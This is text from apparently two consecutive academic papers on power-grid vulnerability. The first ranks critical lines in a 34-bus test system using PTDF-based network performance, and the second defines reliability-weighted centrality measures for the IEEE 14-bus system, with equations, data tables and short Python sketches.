The load through a node or edge is a critical concept in the research on cascading failures in power grids [11][12] and in the assessment of the importance of components [4]. However, in these works the load of a node or edge is defined, according to the general theory of CN, as equal to the betweenness, i.e. the number of shortest paths traversing that component. Besides the shortest-path assumption mentioned above, this concept cannot be accepted directly for power grids, for the following two reasons. Firstly, the paths between nodes, or the capacity of the transmission paths, should not be confused with the real power load transmitted along the paths. Secondly, the network model in the general theory of CN is unweighted and undirected. The identification of possible paths connecting two nodes is based on graph theory, where transmission lines are assumed to be bidirectional [7]. As the PTDF are signed, some paths in the undirected model may not be valid in the directed power transmission network. Therefore, the calculation of betweenness or the identification of shortest paths with the general theory of CN may take into account paths which are meaningless for power transmission, and this may seriously distort the results.

2.3 Heterogeneity of Components

In general or preliminary research, to avoid the difficulties involved in their differentiation and dynamical behaviour characterization, all elements have been treated identically [4]. However, in references [8][9][13] this idea was applied directly to power grids, where the situation may be very different. The buses in the grid may have different functions in energy transmission. Generally, we can classify the buses in power transmission networks as generation buses $G_g$, transmission buses $G_t$ and distribution buses
$G_d$. Only the generation buses should be considered as source nodes, and only distribution buses should be considered as destination nodes. Therefore, as assumed in [4][11], the analysis of power grids by CN with respect to power supply behaviour should only take into account the power transmission between the generator buses and the distribution substations.

Even for components with the same function, differences in some quantified features will impact network behaviour. In formerly performed analyses of power grids by CN with unweighted models, the impacts of these features have not been properly assessed. For example, in the calculation of betweenness [4] or efficiency [8], the path between each considered pair of nodes contributes equally to the evaluation of the considered measurement. In fact, for the loads on the same bus, the paths connecting to different generators have different lengths and capacities, and these will undoubtedly lead to different power supply abilities for this load bus.
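Before turning to the performance definition, it may help to see how the PTDF matrix of (1) can be obtained under the DC power flow approximation; the following minimal sketch uses an invented four-bus network and is not tied to any particular tool or to the test system of Section 4.

```python
import numpy as np

# Sketch: DC power transmission distribution factors (PTDF) as in (1),
# computed from line reactances for a small invented 4-bus network.
lines = [(0, 1, 0.1), (0, 2, 0.2), (1, 2, 0.15), (2, 3, 0.1)]  # (from, to, x)
n, ref = 4, 3  # reference (slack) bus j = 3

B = np.zeros((n, n))
for f, t, x in lines:
    b = 1.0 / x
    B[f, f] += b; B[t, t] += b
    B[f, t] -= b; B[t, f] -= b

# Invert the susceptance matrix with the reference bus removed; its row
# and column stay zero, so injections at the reference give zero flow.
keep = [i for i in range(n) if i != ref]
Binv = np.zeros((n, n))
Binv[np.ix_(keep, keep)] = np.linalg.inv(B[np.ix_(keep, keep)])

# Row l, column i: flow on line l per unit injected at i, withdrawn at ref.
A = np.array([[(Binv[f, i] - Binv[t, i]) / x for i in range(n)]
              for f, t, x in lines])
print(np.round(A, 3))
```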
3 Global Network Performance

In this section, addressing the obstacles discussed above, we propose solutions based on the knowledge of electrical power engineering in order to define a global network performance of power grids.

3.1 Length and Contribution of Paths

To overcome the unrealistic assumption of considering only the shortest path between a generation node g and a load node d, we resort to the PTDF to measure the contribution of all involved paths. If the reference node for the PTDF in (1) is j, the columns corresponding to node g and node d can be written as $A_{\cdot g}(j)$ and $A_{\cdot d}(j)$. The distribution factors corresponding to node g, with node d as reference, can then be calculated as:

$A_{\cdot g}(d) = A_{\cdot g}(j) - A_{\cdot d}(j)$   (2)
$A_{\cdot g}(d)$ gives the distribution factor of each edge for the power transmission from node g to node d; the entry $a_{lg}(d)$ is the distribution factor of edge l. In this way, the power distribution factors between any pair of nodes can be calculated directly from (1). We drop the reference node d in the following formulas for simplicity. After obtaining the distribution factors of all edges, we need to identify all valid paths involved in the power transmission from g to d and calculate the distribution factors for each path. The procedure can be summarised in the following steps:

1. Starting from the source node g, follow an output path p according to the direction of the PTDF.
2. When path p arrives at a new node i, and if i is not node d, partition path p into multiple new paths according to the output edges of i and recalculate the PTDF for each of them.
3. Continue to follow one of the new paths and repeat step 2 until the current path arrives at d.
4. Repeat until all possible paths have been followed to d.
In step 2, the recalculation of the PTDF has to consider the three different cases shown in Fig. 1. Since a path is a different concept from an edge, multiple paths can go through the same edge; we indicate paths by dashed lines and edges by solid lines. In case (a), no matter how many input paths there are, since there is only one output edge of node i, the PTDF of path p remains unchanged. In case (b), since there is only one input path p, it is partitioned into multiple new paths corresponding to the multiple output edges; the PTDF of each new path is therefore equal to the PTDF of the corresponding output edge. In case (c), where we have multiple input paths and multiple output edges, the problem becomes a little more complex. Each input path p can be partitioned into multiple new paths corresponding to the output edges. However, all input paths may contribute to the power flow in each output edge, and it is difficult to identify how much power flows from each input path into each output edge. Therefore, we make a linear assumption: the assignment of power flow from one input path to all output edges is proportional to the PTDF of these edges; equivalently, the contributions of all input paths to one output edge are proportional to the PTDF of these input paths. This policy can be generally extended to the former cases (a) and (b).
Fig. 1. Different cases for recalculation of PTDF for paths
In summary of all three cases, if node i has U output edges (l_1, l_2, ..., l_U), each input path p with PTDF f_p is partitioned into U new paths. The PTDF f_{p_k} of the new path obtained from p through edge l_k (k = 1, ..., U) can be calculated as:

f_{p_k} = f_p \frac{a_{l_k g}}{\sum_{s=1}^{U} a_{l_s g}}    (3)

Let P_{gd} be the set of all valid paths from g to d; we can then obtain the PTDF f_p of each path p in P_{gd}. f_p can be considered as a weight indicating how much path p contributes to the power transmission from g to d. Moreover, the length d(p) of path p is the sum of the impedances of the edges along the path:

d(p) = \sum_{l \in p} Z_l    (4)
3.2 Capacity of Each Path

To reflect the heterogeneity of lines in power flow capacity, we define the generator bus g, together with all the involved paths P_{gd} from it to the distribution bus d, as a power supply scheme h(g, d) for the power consumed at d. The capacity of scheme h is then defined as follows: the injection from g is increased from zero until the first line among all involved paths reaches its maximum power flow limit P_l^{max}, at which point the injection equals M_h:

M_h = \min_{l \in L} \frac{P_l^{max}}{|a_{lg}|}    (5)

The capacity of each involved path p can then be calculated as:

M_p = f_p \cdot M_h    (6)
3.3 Global Network Performance

To indicate the power supply ability of the whole network, we propose the concept of global network performance of a power grid, a general statistical evaluation of the network. The definition is based on the global efficiency from the general theory of CN [17] and should satisfy the following three policies:

1. With equal length, more power supply capacity means better performance.
2. With equal power supply capacity, shorter length means better performance.
3. Only power transmission from generation buses to distribution buses should be considered.

We then define the global network performance E(G) of a power grid G as:

E(G) = \frac{1}{N_g N_d} \sum_{g \in G_g} \sum_{d \in G_d} \sum_{p \in P_{gd}} \frac{M_p}{d(p)}    (7)
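As an illustration, a minimal Python sketch of (7) follows; the dictionary `paths`, holding the (M_p, d(p)) pairs computed as in Sections 3.1 and 3.2 for every generator/load pair, is our own assumed data structure rather than part of the paper.

def global_performance(generators, loads, paths):
    """E(G) of (7): average capacity-weighted inverse path length."""
    total = 0.0
    for g in generators:
        for d in loads:
            for m_p, d_p in paths.get((g, d), []):
                total += m_p / d_p          # M_p weighted by 1/d(p)
    return total / (len(generators) * len(loads))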
3.4 Analysis of Vulnerability by Network Performance

The basic idea in the CN analysis of structural vulnerabilities of power grids is to compare the network performance before and after attacks on, or failures of, some components. The relative drop of network performance is defined as:

\Delta E_r = \frac{E(G) - E(G - l_i)}{E(G)}    (8)
In reference [17], the vulnerability of an infrastructure system was defined as the maximum relative drop of network performance under a specific set of attacks or failures. This idea has been applied to vulnerability analysis in several works [7][8][14][15][16], which differ only in the concrete methods used to evaluate performance. A shortcoming of this approach is the heavy computational burden when it is applied to large-scale networks, especially for the calculation of the contributions of all involved paths.
However, the PTDF values of the edges vary widely. If we only consider edges with PTDF values above a specific threshold (e.g., 0.05, i.e., 5 percent of the total power flow), then for a network with several hundred nodes only the small fraction of paths carrying most of the power flow needs to be calculated. In this way, the method becomes applicable to most normal high-voltage transmission networks with several hundred buses.
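A hedged sketch of the resulting procedure is given below: the vulnerability scan of (8) over all lines, together with the PTDF thresholding shortcut. The helpers `performance` and `remove_line` are assumed stand-ins for an implementation of (7) and for grid editing; they are not defined in the paper.

def relative_drops(grid, lines, performance, remove_line):
    """Delta E_r of (8) for the removal of each line."""
    e0 = performance(grid)
    return {l: (e0 - performance(remove_line(grid, l))) / e0
            for l in lines}

def significant_edges(ptdf, threshold=0.05):
    """Keep only edges carrying at least `threshold` of the total flow,
    so that path enumeration stays tractable on larger networks."""
    return {edge: a for edge, a in ptdf.items() if abs(a) >= threshold}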
4 Case Study

We apply the definitions of global network performance above to a 34-bus system whose data are given in the appendix. As most CN research considers only one edge between two vertices, we combine parallel lines between two buses into a single line. According to the definition of vulnerability in [17], it depends on a specific set of damages. Since transmission lines are easier to attack than substations, which are protected with more resources, here we only consider attacks on transmission lines as indicative examples. The method remains applicable to a larger set of damages including substations, similarly to the node-removal simulations carried out in many other works. Due to length constraints, we only present the transmission-line case. We then apply the definition of global network performance and the definition of global efficiency in [8][9][15][17] to the model system and compare the relative drop of both caused by destroying each line l_i. The results are shown in Figure 2, where the horizontal axis denotes the line number and the vertical axis denotes the relative drops of global network performance and global efficiency caused by the removal of each line. The values corresponding to (8) are shown by the solid line and the values of the efficiency defined in the references mentioned above by the dashed line.
Fig. 2. Comparison of relative drop of performance and efficiency
Fig. 3. Total overload power flow caused by failure of each line

Table 1. Distribution of generations and loads (capacities of generations & loads)

Bus NO. | Generation (p.u.) | Load (p.u.) | Bus NO. | Generation (p.u.) | Load (p.u.)
1  | 0   | 0   | 18 | 0    | 0.9
2  | 1.8 | 0   | 19 | 1.15 | 0
3  | 0   | 1   | 20 | 0    | 1.75
4  | 0   | 3.8 | 21 | 2.7  | 0
5  | 0   | 1.8 | 22 | 0    | 0.6
6  | 2.4 | 0   | 23 | 0    | 0.6
7  | 0   | 0   | 24 | 0    | 0.5
8  | 0   | 0   | 25 | 0    | 0.5
9  | 2   | 0   | 26 | 0    | 0.5
10 | 3.4 | 0   | 27 | 0    | 0.5
11 | 0   | 0   | 28 | 0    | 0
12 | 0   | 0   | 29 | 0    | 0.9
13 | 4   | 0   | 30 | 0    | 0.95
14 | 0   | 0   | 31 | 0    | 0.9
15 | 0   | 0   | 32 | 0    | 1.05
16 | 0   | 0   | 33 | 0    | 0.6
17 | 0   | 0   | 34 | 0    | 0.6
According to Figure 2, when evaluated by the generic concept of efficiency there is no obvious critical line, because the relative drop of efficiency caused by attacking any line is always less than 0.1. However, when evaluated by the global network performance defined in this paper,
Table 2. Line data

Line NO. | Start bus | End bus | Admittance (p.u.) | P_l^max (p.u.)
1  | 1  | 2  | 0.05062 | 2.286
2  | 1  | 3  | 0.05785 | 3.0
3  | 1  | 4  | 0.05785 | 2.286
4  | 1  | 4  | 0.08161 | 2.286
5  | 1  | 8  | 0.12934 | 2.286
6  | 1  | 10 | 0.00413 | 2.477
7  | 1  | 10 | 0.00413 | 2.477
8  | 2  | 4  | 0.05062 | 2.286
9  | 2  | 11 | 0.00413 | 2.286
10 | 3  | 4  | 0.13843 | 2.286
11 | 3  | 5  | 0.20041 | 2.286
12 | 3  | 12 | 0.00413 | 2.286
13 | 3  | 12 | 0.00413 | 2.286
14 | 4  | 15 | 0.05114 | 2.286
15 | 4  | 7  | 0.06818 | 2.286
16 | 4  | 13 | 0.00413 | 2.286
17 | 4  | 13 | 0.00413 | 2.286
18 | 5  | 15 | 0.0657  | 2.477
19 | 5  | 14 | 0.00413 | 2.286
20 | 6  | 15 | 0.00413 | 2.286
21 | 6  | 15 | 0.00413 | 2.286
22 | 7  | 8  | 0.06674 | 2.286
23 | 7  | 16 | 0.00413 | 2.286
24 | 8  | 17 | 0.00413 | 2.286
25 | 9  | 14 | 0.08161 | 2.286
26 | 30 | 29 | 0.04756 | 1.039
27 | 30 | 29 | 0.04756 | 1.039
28 | 30 | 29 | 0.04756 | 1.039
29 | 32 | 30 | 0.04756 | 1.039
30 | 32 | 30 | 0.04756 | 1.039
31 | 32 | 31 | 0.04756 | 1.039
32 | 32 | 31 | 0.04756 | 1.039
33 | 34 | 33 | 0.092   | 1.039
34 | 33 | 32 | 0.092   | 1.039
35 | 24 | 25 | 0.04756 | 1.039
36 | 26 | 25 | 0.04756 | 1.039
37 | 27 | 26 | 0.04756 | 1.039
38 | 28 | 27 | 0.04756 | 1.039
39 | 19 | 20 | 0.04756 | 1.039
40 | 19 | 20 | 0.04756 | 1.039
41 | 21 | 20 | 0.04756 | 1.039
42 | 21 | 20 | 0.04756 | 1.039
43 | 21 | 22 | 0.092   | 1.039
44 | 18 | 21 | 0.04756 | 1.039
45 | 18 | 21 | 0.04756 | 1.039
46 | 22 | 23 | 0.092   | 1.039
47 | 29 | 12 | 0.01033 | 3.811
48 | 31 | 14 | 0.01033 | 2.286
49 | 34 | 9  | 0.02066 | 2.286
50 | 24 | 16 | 0.02066 | 2.477
51 | 28 | 6  | 0.02066 | 2.477
52 | 19 | 17 | 0.01033 | 3.429
53 | 18 | 11 | 0.01033 | 2.286
54 | 23 | 13 | 0.04132 | 2.286
it is obvious that an attack on line NO. 13 (between bus 4 and bus 13) causes an outstanding relative drop of more than 0.5. This means line NO. 13 is the most critical line of the system: its failure would put the system into a much more serious emergency than the failure of any other line. We can then check whether line NO. 13 is really more important to the network than the other lines. To reasonably reflect the normal response of the network under different load levels, we make the total load consumption over 24 hours follow the shape of a real load curve from reference [18] and assign it to all load nodes proportionally to their mean values, which are given in the appendix. Each line was deleted under the different load levels and the resulting total overload power of the whole system was calculated. The results of the simulation are given in Figure 3. Although the varying load consumption and generator output make the power flow differ across load levels, it is obvious that attacking line NO. 13 always causes serious overload, far higher than for any other line, and can seriously threaten the system. Therefore, line NO. 13 is without doubt the most critical line of the system, the one that makes the system vulnerable to malicious attacks. However, if we consider this problem through the generic conception of efficiency, it is impossible to locate this weak point, because that measurement doesn't reflect the real physical situation in power grids.
5 Conclusions

In this paper, we have identified several important obstacles that must be specifically addressed when applying methods or measurements from CN to power grids. The conception of global network performance, defined on the basis of the proposed solutions to these obstacles, has been applied to a model system. The results show that the adapted conception takes more useful information into account in the analysis of power grids. Moreover, the security analysis based on the new definition of network performance has proved more effective in locating the critical components of the network and evaluating the vulnerability of the system.
Acknowledgements

This work has been supported by the Next Generation Infrastructures Foundation.
References

1. Bompard, E., Gao, C., Masera, M., Napoli, R., Russo, A., Stefanini, A., Xue, F.: Approaches To The Security Analysis of Power Systems: Defence Strategies Against Malicious Threats, EUR 22683 EN, ISSN 1018-5593. Office for Official Publications of the European Communities, Luxembourg (2007)
2. Holmgren, J., Jenelius, E., Westin, J.: Evaluating Strategies for Defending Electric Power Networks Against Antagonistic Attacks. IEEE Trans. Power Systems 22 (February 2007)
3. Motto, A.L., Arroyo, J.M., Galiana, F.D.: A mixed-integer LP procedure for the analysis of electric grid security under disruptive threat. IEEE Trans. Power Systems 20(3), 1357–1365 (2005)
4. Albert, R., Albert, I., Nakarado, G.L.: Structural vulnerability of the North American power grid. Physical Review E 69, 025103(R) (2004)
5. Watts, D.J., Strogatz, S.H.: Collective dynamics of small-world networks. Nature 393(6684), 440–442 (1998)
6. Barabási, A.-L., Albert, R.: Emergence of scaling in random networks. Science 286, 509–512 (1999)
7. Rosas-Casals, M., Valverde, S., Sole, R.V.: Topological Vulnerability of the European Power Grid Under Errors and Attacks. International Journal of Bifurcation and Chaos 17(7), 2465–2475 (2007)
8. Crucitti, P., Latora, V., Marchiori, M.: Locating Critical Lines in High-Voltage Electrical Power Grids. Fluctuation and Noise Letters 5(2), L201–L208 (2005)
9. Rosato, V., Bologna, S., Tiriticco, F.: Topological properties of high-voltage electrical transmission networks. Electric Power Systems Research 77 (2007)
10. Chassin, D.P., Posse, C.: Evaluating North American electric grid reliability using the Barabasi-Albert network model. Physica A 355, 667–677 (2005)
11. Kinney, R., Crucitti, P., Albert, R., Latora, V.: Modeling Cascading Failures in the North American Power Grid. Eur. Phys. J. B 46, 101 (2005)
12. Crucitti, P., Latora, V., Marchiori, M.: A topological analysis of the Italian electric power grid. Physica A 338, 92–97 (2004)
13. Motter, A.E., Lai, Y.-C.: Cascade-based attacks on complex networks. Physical Review E 66, 065102(R) (2002)
14. Latora, V., Marchiori, M.: Efficient Behavior of Small-World Networks. Physical Review Letters 87(19) (November 5, 2001)
15. Latora, V., Marchiori, M.: How the science of complex networks can help developing strategies against terrorism. Chaos, Solitons & Fractals 20, 69–75 (2004)
16. Albert, R., Jeong, H., Barabasi, A.-L.: Error and attack tolerance of complex networks. Nature 406 (July 27, 2000)
17. Latora, V., Marchiori, M.: Vulnerability and protection of infrastructure networks. Physical Review E 71, 015103(R) (2005)
18. Wang, C., Cui, Z., Chen, Q.: Short-term Load Forecasting Based on Fuzzy Neural Network. In: IEEE Workshop on Intelligent Information Technology Application, December 2-3, pp. 335–338 (2007)
Using Centrality Measures to Rank the Importance of the Components of a Complex Network Infrastructure

Francesco Cadini, Enrico Zio, and Cristina-Andreea Petrescu

Dipartimento di Energia - Politecnico di Milano, Via Ponzio 34/3, I-20133 Milan, Italy
Abstract. Modern society is witnessing a continuous growth in the complexity of the infrastructure networks which it relies upon. This raises significant concerns regarding safety, reliability and security. These concerns are not easily dealt with by classical risk assessment approaches. In this paper, the concept of centrality measures introduced in complexity science is used to identify the contribution of the elements of a network to the efficiency of its connection, accounting for the reliability of its elements. As an example of application, the centrality measures are computed for an electrical power transmission system from the literature.
1 Introduction
An important issue for the protection of large-scale networks is that of determining the critical elements in the network. From a topological viewpoint, various measures of the importance of a network element (arc or node), i.e. of the relevance of its location in the network with respect to a given network performance, can be introduced. In social networks, for example, the so-called centrality measures are introduced as importance measures to qualify the role played by an element in the complex interaction and communication occurring in the network. The term 'importance' is then intended to qualify the role that the presence and location of the element plays with respect to the average global and local properties of the whole network. Classical topological centrality measures are the degree centrality [1], [2], the closeness centrality [2], [3], [4], the betweenness centrality [2] and the information centrality [5]. They rely only on topological information to qualify the importance of a network element. When looking at the safety, reliability and vulnerability characteristics of a physical network infrastructure, one should take into account the probability of occurrence of faults and malicious attacks in the various access points of the network. Then, the importance of an element is related also to these aspects, and not only to its topological location within the network. To this aim, local and global reliability centrality measures are here introduced by extension of the classical topological centrality measures. By considering the 'reliability distances' among network nodes in terms of the probabilities of failure of the interconnecting links (or arcs, or edges), these measures give additional insights into the robustness of
the network systems, useful for their optimal design, operation and protection. The underlying idea in the qualification of the importance of the elements of a network is that an infrastructure is more 'safety-efficient' when its elements are connected through more reliable paths. An application is illustrated with regard to the characterization of the importance of the nodes that constitute the transmission network system of the IEEE (Institute of Electrical and Electronics Engineers) 14 BUS (a portion of the American Electric Power System) [6]. This network has been chosen because it retains the relevant features of interconnected structures, while its simplicity allows the significance of the reliability centrality measures to be shown explicitly. The paper is organized as follows: in Section 2, the classical topological centrality measures are first reviewed and their reliability extensions are then introduced; in Section 3, a description of the transmission network is provided and the different topological and reliability centrality measures are compared and discussed; conclusions on the outcomes of the study are eventually drawn in Section 4.
2 Centrality Measures

2.1 Topological Centrality Measures
The centrality measures are first presented from a purely topological point of view. To this aim, a generic network system is conveniently represented as a connected graph G(N, K), with N nodes and K edges, which has N(N-1)/2 distinct pairs of nodes connected by shortest paths. Each link is considered to have a length equal to one, so the distance between two nodes i and j is represented solely by the number of edges traveled on the path from i to j. The graph is described by the so-called adjacency matrix {a_ij}, an N x N matrix whose entry a_ij is 1 if there is an edge between i and j and 0 otherwise. The diagonal entries a_ii are undefined and for convenience are set equal to 0. The topological degree centrality, C^D, gives the highest importance score to the node with the largest number of first neighbors. This agrees with the intuitive way of estimating the influence of a node in a graph from the size of its immediate environment. Quantitatively, the topological degree centrality is defined as the degree of a node, normalized over the maximum number of neighbors this node could have; thus, in a network of N nodes, the topological degree centrality of node i, C_i^D, is defined as [1], [2]:

C_i^D = \frac{k_i}{N-1} = \frac{\sum_{j \in G} a_{ij}}{N-1}, \quad 0 \le C_i^D \le 1    (1)

where k_i is the degree of node i and N - 1 is the normalization factor introduced to account for the fact that a given node i can at most be adjacent to N - 1 other nodes.
The running time required for computing C^D for all nodes is O(N). The topological closeness centrality, C^C, captures the idea of speed of communication between nodes, in the sense that the node which is "closest" to all others receives the highest score. In other words, this measure identifies the nodes which on average need fewer steps to communicate with the other nodes, not only with the first neighbors. Because this measure is defined as "closeness", quantitatively the inverse of the node's mean distance from all the others is used. If d_ij is the topological shortest path length between nodes i and j, i.e. the minimum number of edges traversed to get from i to j, the topological closeness centrality of node i is [2], [3], [4]:

C_i^C = \frac{N-1}{\sum_{j \in G} d_{ij}}, \quad 0 \le C_i^C \le 1    (2)
Note that this measure too is normalized to assume values in the interval [0, 1]. The running time required for computing C^C for all nodes by means of the Floyd algorithm [7] is O(N^3). The topological betweenness centrality, C^B, is based on the idea that a node is central if it lies between many other nodes, in the sense that it is traversed by many of the shortest paths connecting pairs of nodes. The topological betweenness centrality of a given node i is quantitatively defined as [2]:

C_i^B = \frac{1}{(N-1)(N-2)} \sum_{j,k \in G, j \ne k \ne i} \frac{n_{jk}(i)}{n_{jk}}, \quad 0 \le C_i^B \le 1    (3)
where n_jk is the number of topological shortest paths between nodes j and k, and n_jk(i) is the number of topological shortest paths between nodes j and k which contain node i. Similarly to the other topological centrality measures, C_i^B assumes values between 0 and 1 and reaches its maximum when node i falls on all geodesics (paths of minimal length between two nodes). The running time required for computing C^B for all nodes by means of the Floyd algorithm is O(N^3). The topological information centrality, C^I, relates a node's importance to the ability of the network to respond to the deactivation of that node. In this view, the network performance is measured by the network topological efficiency E[G] defined as [5]:

E[G] = \frac{1}{N(N-1)} \sum_{i,j \in G, i \ne j} \varepsilon_{ij}    (4)
where ε_ij = 1/d_ij is the efficiency of the connection between nodes i and j, measured as the inverse of the shortest path distance linking them. The topological information centrality of node i is defined as the relative drop in the network topological efficiency caused by the removal of the edges incident in i [5]:

C_i^I = \frac{\Delta E(i)}{E} = \frac{E[G] - E[G'(i)]}{E[G]}, \quad 0 \le C_i^I \le 1    (5)
where G'(i) is the graph with N nodes and K - k_i edges obtained by removing from the original graph G the edges incident in node i. An advantage of using the efficiency to measure the performance of a graph is that E[G] is finite even for disconnected graphs. C^I is also normalized by definition in the interval [0, 1]. The running time required for computing C^I for all nodes by means of the Floyd algorithm is O(N^4) [8].
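As a side illustration (ours, not the authors'), the four topological measures can be computed with standard graph tooling. The sketch below uses networkx; the efficiency-drop information centrality of (5) is implemented by hand, since the function networkx ships under the name information_centrality is the different, current-flow variant.

import networkx as nx

# toy graph: the 132 kV subnetwork (buses 1-5) of the IEEE 14 BUS system
G = nx.Graph([(1, 2), (1, 5), (2, 3), (2, 4), (2, 5), (3, 4), (4, 5)])

c_deg = nx.degree_centrality(G)       # (1): k_i / (N - 1)
c_clo = nx.closeness_centrality(G)    # (2): (N - 1) / sum_j d_ij
c_bet = nx.betweenness_centrality(G)  # (3), normalized over node pairs

def information_centrality(G):
    """(5): relative efficiency drop when the edges of node i are cut."""
    e_full = nx.global_efficiency(G)  # (4)
    scores = {}
    for i in G.nodes():
        H = G.copy()
        H.remove_edges_from(list(G.edges(i)))  # keep node, drop its edges
        scores[i] = (e_full - nx.global_efficiency(H)) / e_full
    return scores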
2.2 Reliability Centrality Measures
To include reliability-related information into the centrality measures, the formalism of weighted networks is adopted [9]. In particular, the weight of interest is the reliability p_ij of the connection between pairs of nodes i and j [10]. On the basis of both {a_ij} and {p_ij} (or the complementary failure probability matrix {q_ij}), the matrix of the most reliable path lengths {rd_ij} can be computed [10]:

rd_{ij} = \min_{\gamma_{ij}} \left( \frac{1}{\prod_{mn \in \gamma_{ij}} p_{mn}} \right) = \min_{\gamma_{ij}} \left( \frac{1}{\prod_{mn \in \gamma_{ij}} (1 - q_{mn})} \right)    (6)
where the minimization is done with respect to all paths γ_ij linking nodes i and j, and the product extends to all the edges of each of these paths. Note that 1 ≤ rd_ij ≤ ∞, the lower value corresponding to the existence of a perfectly reliable path connecting i and j (i.e. p_mn = 1, q_mn = 0, ∀ mn ∈ γ_ij) and the upper value corresponding to the situation of no paths connecting i and j (i.e. p_mn = 0, q_mn = 1). On the basis of this definition, it is possible to extend the previously defined centrality measures so as to account for the reliability characteristics of the network arcs. The reliability degree centrality, RC^D, of node i in a network of N nodes is defined as:

RC_i^D = \frac{k_i \sum_{j \in G} p_{ij}}{(N-1)^2}, \quad 0 \le RC_i^D \le 1    (7)
where k_i is the degree of node i and p_ij is the reliability of edge ij. Differently from (1), the normalization factor (N - 1)^2 is introduced here to account for the fact that max(k_i) = N - 1 when node i is fully connected and max \sum_{j \in G} p_{ij} = N - 1 when all the N - 1 edges are fully reliable (p_ij = 1, ∀ j ∈ G). Thus, the measure RC^D is normalized in the interval [0, 1]. The reliability closeness centrality, RC^C, measures to which extent a node i is near to all other nodes along the most reliable paths and is defined in the same
way as its topological analog C_i^C (2), but with d_ij replaced by rd_ij (6). RC^C also assumes values in the interval [0, 1]. The reliability betweenness centrality, RC^B, is based on the idea that a node is central if it lies between many other nodes, in the sense that it is traversed by many of the most reliable paths connecting pairs of nodes; it is defined in the same way as its topological analog C_i^B (3), in which n_jk is replaced by rn_jk (the number of most reliable paths between nodes j and k) and n_jk(i) is replaced by rn_jk(i) (the number of most reliable paths between nodes j and k that contain node i). This measure too is normalized in the range [0, 1]. For the reliability information centrality, RC^I, the network performance is measured by the reliability efficiency RE[G] of the graph G defined as:

RE[G] = \frac{1}{N(N-1)} \sum_{i,j \in G, i \ne j} r\varepsilon_{ij}    (8)
where rε_ij is the reliability efficiency between the two nodes i and j, defined as its topological analog ε_ij but with d_ij replaced by rd_ij (6). Thus, the network is also characterized by the matrix {rε_ij} whose entries are the reliability efficiencies between pairs of nodes i and j. The reliability information centrality of node i, RC_i^I, is defined as its topological analog C_i^I (5), but with the network reliability efficiency RE[G] replacing the topological efficiency E[G]. RC_i^I is also normalized in the interval [0, 1]. The running times required for computing the above reliability centrality measures, RC^D, RC^C, RC^B and RC^I, are the same as those for the topological cases.
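A compact way to compute the rd_ij of (6) (our illustration, not the authors' code) exploits the fact that the path maximizing the product of the edge reliabilities also minimizes the sum of -log p_mn, so an ordinary shortest-path algorithm applies. Edge reliabilities are assumed stored as a 'p' attribute, e.g. obtained from the failure rates via (9) in Section 3, with 0 < p <= 1.

import math
import networkx as nx

def reliability_distances(G):
    """Most-reliable-path lengths rd_ij = 1 / prod(p_mn) >= 1."""
    H = nx.Graph()
    for u, v, data in G.edges(data=True):
        H.add_edge(u, v, w=-math.log(data['p']))  # p in (0, 1]
    rd = {}
    for i, dists in nx.all_pairs_dijkstra_path_length(H, weight='w'):
        for j, d in dists.items():
            rd[(i, j)] = math.exp(d)
    return rd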
3 Application to a Power Transmission Network
The transmission network system IEEE 14 BUS [6] is taken as the reference case study. The network is simple enough to allow the explicit illustration and interpretation of the reliability centrality measures introduced in Section 2.2, while at the same time it retains the critical aspects related to interconnected structures. The network represents a portion of the American Electric Power System and consists of 14 bus locations connected by 20 lines and transformers, as shown in Figure 1. The transmission lines operate at two different voltage levels, 132 kV and 230 kV. The system working at 230 kV is represented in the upper half of Figure 1, with 230/132 kV tie stations at Buses 4, 5 and 7. Buses 1 and 2 are the generating units. The system is also provided with voltage corrective devices (synchronous condensers) at Buses 3, 6 and 8. Each network component is transposed into a node or edge of the representative network, and the topological and reliability centrality measures illustrated in Section 2 are computed in order to determine the relative importance of a node within the network.
Table 1. Failure rates for the arcs

From BUS | To BUS | Failure rate (occ/yr) | Equipment
1  | 2  | 1.0858 | 132 kV transmission line
1  | 5  | 1.0858 | 132 kV transmission line
2  | 3  | 1.0858 | 132 kV transmission line
2  | 4  | 1.0858 | 132 kV transmission line
2  | 5  | 1.0858 | 132 kV transmission line
3  | 4  | 1.0858 | 132 kV transmission line
4  | 5  | 1.0858 | 132 kV transmission line
4  | 7  | 0.0105 | 132/230 kV transformer
4  | 9  | 0.0105 | 132/230 kV transformer
5  | 6  | 0.0105 | 132/230 kV transformer
6  | 11 | 0.5429 | 230 kV transmission line
6  | 12 | 0.5429 | 230 kV transmission line
6  | 13 | 0.5429 | 230 kV transmission line
7  | 8  | 0.0105 | 132/230 kV transformer
7  | 9  | 0.0105 | 132/230 kV transformer
9  | 10 | 0.5429 | 230 kV transmission line
9  | 14 | 0.5429 | 230 kV transmission line
10 | 11 | 0.5429 | 230 kV transmission line
12 | 13 | 0.5429 | 230 kV transmission line
13 | 14 | 0.5429 | 230 kV transmission line
The network visualizations have been produced with the Pajek program for large network analysis [11]. Table 1 provides the power-dependent failure rates of the components (transmission lines and transformers) of the transmission network, as inferred from literature data [12] under the simplifying assumption of an equal length of 100 km for all the network lines. The reliability of edge ij is defined as:

p_{ij} = e^{-\lambda_{ij} T}    (9)
where λ_ij is the failure rate of edge ij linking nodes i and j and T is a reference time, here chosen equal to 1 year. It is then possible to compute the most reliable path lengths {rd_ij} and thus the reliability centrality measures. Table 2 lists all 14 network nodes ranked according to the four topological centrality measures (columns two, four, six and eight) and to the four reliability centrality
Fig. 1. Transmission network [6]
Fig. 2. The IEEE 14 BUS transmission network’s graph representation
measures (columns three, five, seven and nine). Figures 3 to 6 show the values of the four centrality measures considered (degree, closeness, betweenness and information, respectively) both from the topological and the reliability points of view.
Table 2. Topological and Reliability Centrality Measures

[Table rows garbled in extraction. Recoverable: node 4 ranks first under C^D, RC^D, C^C, RC^C, C^B and C^I; node 6 ranks first under RC^B; node 7 ranks first under RC^I; node 9 ranks second under most measures. The complete rankings are discussed measure by measure in Sections 3.1-3.4.]

3.1 Degree Centrality Measures (C^D and RC^D)
